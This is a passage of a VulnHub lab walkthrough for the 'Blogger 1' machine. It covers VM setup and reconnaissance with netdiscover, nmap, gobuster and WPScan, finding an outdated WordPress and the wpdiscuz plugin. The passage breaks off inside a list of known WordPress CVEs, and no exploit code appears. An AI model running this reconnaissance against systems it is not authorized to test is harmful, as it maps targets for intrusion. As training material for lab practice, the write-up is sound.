Blogger: Blogger 1 || VulnHub Complete walkthrough

Table of Contents

• Settings up
• Enumeration
• Network scanning using Nmap
• Discovery of Hidden files and Directories with Gobuster
• WordPress Security Assessment with WPScan
• Foothold
• Exploitation: Gaining Reverse Shell via Unauthenticated Arbitrary File Upload Exploit
• Resolving 'Having Trouble Finding That Site' Issue by Adding Host Address
• Obtaining a Shell via PHP Reverse Shell Upload
• Intercept the request (post comment) in Burp Suite
• Privilege Escalation
• Sudo Privilege Escalation

Hello everyone! Welcome all of my viewers, to this brand-new video. Today, we're diving into a beginner-friendly vulnerable machine known as " Blogger 1 " from the " Blogger " series. You can find the machine categorized as " Easy and beginner level " in terms of difficulty.

To get started, head over to the VulnHub website and download the vulnerable image. If you're new to VulnHub, check out our VulnHub playlist for helpful videos

Settings up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. 

This process is quite simple and involves importing the OVA file into VirtualBox using the " import appliance " feature. However, there is a problem, when I try to start the virtual machine, I encounter an issue where it aborts automatically.

To resolve the problem, we'll need to extract the OVA file and manually install the VM.

First, we'll rename the OVA extension to ZIP.  

Since direct renaming isn't possible, open Command Prompt from this directory by typing "cmd" in the Address bar. This will open Command Prompt in the same directory. 

Use the " dir " command to list all directories and files and then, to rename, utilize the " REN " command.

With the OVA extension changed to ZIP, we can now extract it using WinRAR . 

After extraction, I discovered several helpful files, including two VMDK files . 

Our next step involves creating a new virtual machine. In VirtualBox, click on " New " to create a new VM. 

Name it " Blogger 1 " and select the operating system type and version as Linux Ubuntu 64-bit. 

Proceed by allocating RAM size for your VM and click " Next ." 

Select " Use an existing virtual hard disk file " and import the VMDK file extracted earlier.

After clicking "Next," then "Finish," the setup is complete. 

Once the import is finished, you'll see the " Blogger 1 " vulnerable machine listed in the VirtualBox Manager. 

Select the virtual machine, go to " Settings ," then " Storage ," click on " Controller: SATA ," and use the hard disk selector to add the second VMDK file.

Next, change the network adapter to " Host-only adapter ."

Now, start the VM. 

Finally, you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting. Let's dive into the fun!

 

Enumeration

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using Net Discover. To execute this, open a terminal and run "net discover hyphen i" followed by specifying the network interface name, which in this case is " eth1 ."

┌──(kali㉿kali)-[~]

└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.252.0/16   |   Screen View: Unique Hosts                                                         

                                                                                                                              

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                              

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                             

 192.168.95.2    08:00:27:ce:c7:96      1      60  PCS Systemtechnik GmbH                                                     

 192.168.95.10   08:00:27:96:10:9f      1      60  PCS Systemtechnik GmbH 

From the scan results, we've obtained our target IP address: " 192.168.95.10 ."

Network scanning using Nmap

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular Nmap tool for this task. 

Nmap: Network Mapper

Discover how Nmap, a powerful network mapping tool, can be used for network discovery and security auditing. Learn about its various features, use cases, and techniques to enhance your network security efforts.

Run " nmap -sC -sV {specifying the IP address} ".

In this command, " -sC " is used to perform a script scan using the default set of scripts, while " -sV " enables version detection, allowing us to identify which versions are running on which port.

┌──(kali㉿kali)-[~]

└─$ nmap -sC -sV 192.168.95.10

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 22:34 IST

Nmap scan report for 192.168.95.10

Host is up (0.00047s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)

|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)

|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Blogger | Home

|_http-server-header: Apache/2.4.18 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ 

After completing the network scan, we discovered the presence of two open ports.

• Port 22/TCP is running an SSH service, indicating that gaining access to the server with valid credentials will be straightforward.
• Additionally, Port 80/TCP is hosting an HTTP service, suggesting that a vulnerable website may be accessible.

Let's explore the web content hosted on port 80. To do this, open a web browser of your choice and navigate to the target's IP address in the URL bar.

Upon visiting the website, it's evident that it is being hosted. Let's delve deeper into its web technology for a better understanding.

To accomplish this, we'll utilize Wappalyzer, a Firefox extension designed for discerning web technology.

Upon analysis, we discover that the website is created using Bootstrap. 

After a thorough examination, there doesn't seem to be anything noteworthy to enumerate on the webpage. 

Discovery of Hidden files and Directories with Gobuster

However, there might be hidden or difficult-to-access directories and pages, which we can explore through directory busting.

GoBuster: Brute Force Directories and Files

Explore how GoBuster, a powerful tool, can be used to brute force directories and files on web servers. Learn the techniques and strategies to uncover hidden paths and enhance your web security testing efforts.

We'll use gobuster as our tool of choice, employing various switches for optimal results. Specifically, we'll use " DIR " to specify the enumeration mode, "-u" to specify the target URL, and "-w" to specify the path of the wordlist.

┌──(kali㉿kali)-[~]

└─$ gobuster dir -u http://192.168.95.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://192.168.95.10/

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.6

[+] Timeout:                 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/images               (Status: 301) [Size: 315] [--> http://192.168.95.10/images/]

/assets               (Status: 301) [Size: 315] [--> http://192.168.95.10/assets/]

/css                  (Status: 301) [Size: 312] [--> http://192.168.95.10/css/]

/js                   (Status: 301) [Size: 311] [--> http://192.168.95.10/js/]

Progress: 87664 / 87665 (100.00%)

===============================================================

Finished

===============================================================

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ 

During directory enumeration, we discovered 4 directories: " image," " assets," " css," and " js ." It seems these directories contain their respective content.

Upon examining the image directory, I discovered images used in the Bootstrap website. 

However, there didn't seem to be any interesting files. Let's proceed to the next directory.

After some investigation, I stumbled upon an intriguing directory named " blog " within the " fonts " directory. 

Upon accessing the blog directory, I encountered another webpage that appeared to be broken. 

Let's analyze its web technology, which might provide insights for gaining a foothold in the web app. Using Wappalyzer, I determined that the running broken webpage WordPress.

WordPress Security Assessment with WPScan

As it's a WordPress website, this means we can potentially enumerate and identify vulnerabilities using WPScan. 

If you're unfamiliar with WP Scan and how it's utilized for enumerating WordPress websites, I recommend you to read this article for a comprehensive overview.

WPScan: WordPress Security Scanner

Discover WPScan, a powerful security scanner specifically designed for WordPress websites. This guide covers its features, installation process, and how to use WPScan to identify vulnerabilities and enhance the security of your WordPress site.

Now, let's move forward with scanning the WordPress blog to uncover details such as the WordPress version, theme information, plugin details, and security-related headers. Open a new terminal window and enter the command WPScan --url, followed by the URL of the WordPress site you want to scan.

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.8.25

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]

[+] Started: Thu May  9 22:45:25 2024

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).

 | Found By: Emoji Settings (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'

 | Confirmed By: Meta Generator (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups - Time: 00:00:00 <================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 22:45:38 2024

[+] Requests Done: 164

[+] Cached Requests: 4

[+] Data Sent: 46.142 KB

[+] Data Received: 99.736 KB

[+] Memory used: 226.84 MB

[+] Elapsed time: 00:00:12

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$

After the scan, WP Scan will provide insights into the WordPress installation, including version numbers, theme information, detected plugins, and whether XML-RPC functionality is enabled. The scan results may highlight security concerns such as outdated software versions and exploitable features like XML-RPC, which attackers could target.

However, the scan may not initially provide plugin information. Let's run WP Scan again to enumerate the plugins. To do this, we'll use the ap flag during the scanning process.

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.8.25

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]

[+] Started: Thu May  9 22:49:15 2024

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).

 | Found By: Emoji Settings (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'

 | Confirmed By: Meta Generator (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 22:49:26 2024

[+] Requests Done: 2

[+] Cached Requests: 27

[+] Data Sent: 674 B

[+] Data Received: 1.028 KB

[+] Memory used: 225.793 MB

[+] Elapsed time: 00:00:11

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$

Still, WP Scan hasn't provided us with any plugin information. By default, WP Scan operates the plugin enumeration in passive mode, as indicated in the WP Scan Help documentation. To address this, we need to switch the plugin detection mode to aggressive.

        --detection-mode MODE                      Default: mixed

                                                  Available choices: mixed, passive, aggressive

Let's proceed with the scan again.

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap --plugins-detection aggressive

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.8.25

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]

[+] Started: Thu May  9 22:52:47 2024

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).

 | Found By: Emoji Settings (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'

 | Confirmed By: Meta Generator (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)

 Checking Known Locations - Time: 00:10:10 <=========================================> (105357 / 105357) 100.00% Time: 00:10:10

[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet

  | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/

 | Last Updated: 2024-03-21T00:55:00.000Z

 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

 | [!] The version is out of date, the latest version is 5.3.2

 |

 | Found By: Known Locations (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/, status: 200

 |

 | Version: 4.0.8 (100% confidence)

 | Found By: Readme - Stable Tag (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

[+] wpdiscuz

  | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/

 | Last Updated: 2024-04-24T07:42:00.000Z

 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

 | [!] The version is out of date, the latest version is 7.6.18

 |

 | Found By: Known Locations (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200

 |

 | Version: 7.0.4 (80% confidence)

 | Found By: Readme - Stable Tag (Aggressive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 23:04:00 2024

[+] Requests Done: 105367

[+] Cached Requests: 32

[+] Data Sent: 31.703 MB

[+] Data Received: 14.162 MB

[+] Memory used: 435.488 MB

[+] Elapsed time: 00:11:12

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ 

Upon receiving the results, it shows that two outdated plugins are installed within WordPress: Akismet and wpdiscuz. 

Since they are outdated, they are likely vulnerable. You can verify this using AI tools or by searching on Google.

However, I'll demonstrate an effective way to check for vulnerabilities in these plugins.

The effective method involves using a WPScan API token. 

WPScan provides 25 daily requests. To obtain a token, visit wpScan.com/register , and then here, register by providing some details. 

WPScan: WordPress Security Scanner

Discover WPScan, a powerful security scanner specifically designed for WordPress websites. Register now to access WPScan's comprehensive database of vulnerabilities and start securing your WordPress site effectively.

After clicking the register button, you'll receive an email to verify your email address. Once verified, you'll be able to access the API token. 

The next step is to provide this token to WP Scan using another flag specifically for API tokens.

Now, let's run the scan again. 

┌──(kali㉿kali)-[~]

└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap --plugins-detection aggressive --api-token o*************************************Q

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.8.25

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]

[+] Started: Thu May  9 23:22:19 2024

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).

 | Found By: Emoji Settings (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'

 | Confirmed By: Meta Generator (Passive Detection)

 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

 |

 | [!] 60 vulnerabilities identified:

 |

 | [!] Title: WordPress <= 5.0 - Authenticated File Delete

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/e3ef8976-11cb-4854-837f-786f43cbdf44

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |

 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/999dba5a-82fb-4717-89c3-6ed723cc7e45

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/

 |

 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/046ff6a0-90b2-4251-98fc-b7fba93f8334

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |

 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/3182002e-d831-4412-a27d-a5e39bb44314

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |

 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/7f7a0795-4dd7-417d-804e-54f12595d1e4

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460

 |

 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/65f1aec4-6d28-4396-88d7-66702b21c7a2

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |

 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/d741f5ae-52ca-417d-a2ca-acdfb7ca5808

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149

 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/

 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

 |

 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution

 |     Fixed in: 4.9.9

 |     References:

 |      - https://wpscan.com/vulnerability/1a693e57-f99c-4df6-93dd-0cdc92fd0526

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943

 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/

 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce

 |

 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)

 |     Fixed in: 4.9.10

 |     References:

 |      - https://wpscan.com/vulnerability/d150f43f-6030-4191-98b8-20ae05585936

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787

 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b

 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/

 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

 |

 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation

 |     Fixed in: 4.9.11

 |     References:

 |      - https://wpscan.com/vulnerability/4494a903-5a73-4cad-8c14-1e7b4da2be61

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222

 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/

 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68

 |      - https://hackerone.com/reports/339483

 |

 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/d39a7b84-28b9-4916-a2fc-6192ceb6fa56

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |

 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308

 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/

 |

 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/d005b1f8-749d-438a-8818-21fba45c6465

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |

 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/7804d8ed-457a-407e-83a7-345d3bbe07b2

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |

 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/26a26de2-d598-405d-b00c-61f71cfacff6

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |

 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation

 |     Fixed in: 4.9.12

 |     References:

 |      - https://wpscan.com/vulnerability/715c00e3-5302-44ad-b914-131c162c3f71

 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675

 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/

 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0

 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

 |

